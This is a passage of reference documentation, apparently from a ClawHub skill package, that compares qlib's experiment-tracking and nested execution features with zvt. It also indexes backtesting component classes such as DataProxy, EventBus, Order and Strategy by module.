qlib 的 workflow 模块提供 Experiment/Recorder，自动记录每次模型训练的 超参数、特征、指标、预测结果，支持跨实验比较和模型版本管理。 zvt 目前缺乏 ML 实验追踪机制，每次重跑结果会覆盖前次； 借鉴 Recorder 模式可将每次因子实验的参数和结果持久化，支持快速复现和版本对比。

## `CW-QL-003` — Nested Decision Framework（多层嵌套决策执行）
**From**: qlib · **Applicable to**: backtesting

qlib 支持将高频执行层（分钟级委托拆单）嵌套在低频决策层（日级组合调仓）中， 两层独立优化且可组合运行，实现日内最优执行算法（如 TWAP、VWAP 调仓）。 zvt 目前回测仅有日线级别的成交假设，缺乏执行算法建模； 借鉴嵌套框架可让 zvt 区分"何时持有哪些股"与"如何以最小冲击成本建仓"两个问题。

FILE:references/components/data_layer.md
# data_layer (6 classes)

## `DataProxy.instrument`
`data_layer/dataproxy-instrument.py:0`

## `DataProxy.get_bars`
`data_layer/dataproxy-get-bars.py:0`

## `DataProxy.get_trading_calendar`
`data_layer/dataproxy-get-trading-calendar.py:0`

## `BarDictPriceBoard.get_last_price`
`data_layer/bardictpriceboard-get-last-price.py:0`

## `DataSource backend`
`data_layer/datasource-backend.py:0`

## `PriceBoard implementation`
`data_layer/priceboard-implementation.py:0`

FILE:references/components/event_system.md
# event_system (4 classes)

## `EventBus.publish_event`
`event_system/eventbus-publish-event.py:0`

## `EventBus.prepend_listener`
`event_system/eventbus-prepend-listener.py:0`

## `ExecutionContext.enforce_phase`
`event_system/executioncontext-enforce-phase.py:0`

## `EventSource`
`event_system/eventsource.py:0`

FILE:references/components/order_-_execution.md
# order_&_execution (5 classes)

## `Order.submit`
`order_&_execution/order-submit.py:0`

## `SignalBroker.fill`
`order_&_execution/signalbroker-fill.py:0`

## `StockTransactionCostDecider.calc`
`order_&_execution/stocktransactioncostdecider-calc.py:0`

## `Broker/Matching engine`
`order_&_execution/broker-matching-engine.py:0`

## `Transaction cost model`
`order_&_execution/transaction-cost-model.py:0`

FILE:references/components/portfolio_-_accounting.md
# portfolio_&_accounting (6 classes)

## `Portfolio.unit_net_value`
`portfolio_&_accounting/portfolio-unit-net-value.py:0`

## `Account.cash`
`portfolio_&_accounting/account-cash.py:0`

## `Position.position_pnl`
`portfolio_&_accounting/position-position-pnl.py:0`

## `StockPosition.sellable`
`portfolio_&_accounting/stockposition-sellable.py:0`

## `Position model`
`portfolio_&_accounting/position-model.py:0`

## `Account type`
`portfolio_&_accounting/account-type.py:0`

FILE:references/components/risk_-_scheduler_modules.md
# risk_&_scheduler_modules (5 classes)

## `CashValidator.validate`
`risk_&_scheduler_modules/cashvalidator-validate.py:0`

## `Scheduler.schedule`
`risk_&_scheduler_modules/scheduler-schedule.py:0`

## `Environment.submit_order`
`risk_&_scheduler_modules/environment-submit-order.py:0`

## `FrontendValidator`
`risk_&_scheduler_modules/frontendvalidator.py:0`

## `Scheduler time rules`
`risk_&_scheduler_modules/scheduler-time-rules.py:0`

FILE:references/components/strategy_execution.md
# strategy_execution (5 classes)

## `Strategy.init`
`strategy_execution/strategy-init.py:0`

## `Strategy.handle_bar`
`strategy_execution/strategy-handle-bar.py:0`

## `StrategyContext.submit_order`
`strategy_execution/strategycontext-submit-order.py:0`

## `StrategyContext.portfolio`
`strategy_execution/strategycontext-portfolio.py:0`

## `StrategyLoader`
`strategy_execution/strategyloader.py:0`

ClawHub Data Analysis Research+2

T@clawhub-tangweigang-jpg-8679fec286

1 / 4Next